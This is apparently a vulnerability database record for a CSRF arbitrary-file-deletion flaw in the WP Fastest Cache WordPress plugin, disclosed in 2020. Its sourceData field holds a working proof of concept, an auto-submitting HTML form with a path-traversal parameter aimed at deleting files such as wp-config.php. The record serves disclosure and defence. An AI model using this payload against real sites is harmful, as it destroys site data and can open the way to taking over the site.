Description
The plugin did not have a CSRF nonce check on the "wpfc_delete_current_page_cache" action, allowing CSRF attacks against authenticated users to delete arbitrary files, including the wp-config.php file.
{"id": "WPEX-ID:1FB5A8A0-4769-4E1A-9119-A63AFD9364CC", "type": "wpexploit", "bulletinFamily": "exploit", "title": "WP Fastest Cache < 0.9.0.3 - Cross-Site Request Forgery (CSRF) Arbitrary File Deletion", "description": "The plugin did not have a CSRF nonce check on the \"wpfc_delete_current_page_cache\" action, allowing CSRF attacks against authenticated users to delete arbitrary files, including the wp-config.php file.\n", "published": "2020-02-05T00:00:00", "modified": "2020-03-10T06:00:05", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "wpvulndb", "references": ["https://wearetradecraft.com/advisories/tc-2020-0001/", "https://plugins.trac.wordpress.org/changeset/2235160/wp-fastest-cache"], "cvelist": [], "lastseen": "2021-02-15T22:33:27", "viewCount": 2, "enchantments": {"dependencies": {}, "score": {"value": 1.4, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 1.4}, "sourceData": " <html>\r\n <head></head>\r\n <body>\r\n <form id=\"form\" action=\"https://example.com/wp-admin/admin-ajax.php?path=/../../../..\" method=\"post\">\r\n <input type=\"hidden\" name=\"action\" value=\"wpfc_delete_current_page_cache\"/>\r\n </form>\r\n <script>document.form.submit();</script>\r\n </body>\r\n </html>", "generation": 1, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645805454, "score": 1659842276, "epss": 1679062491}, "_internal": {"score_hash": "e93796c64ff3dca6220344b94706062d"}}
{}
WP Fastest Cache < 0.9.0.3 - Cross-Site Request Forgery (CSRF) Arbitrary File Deletion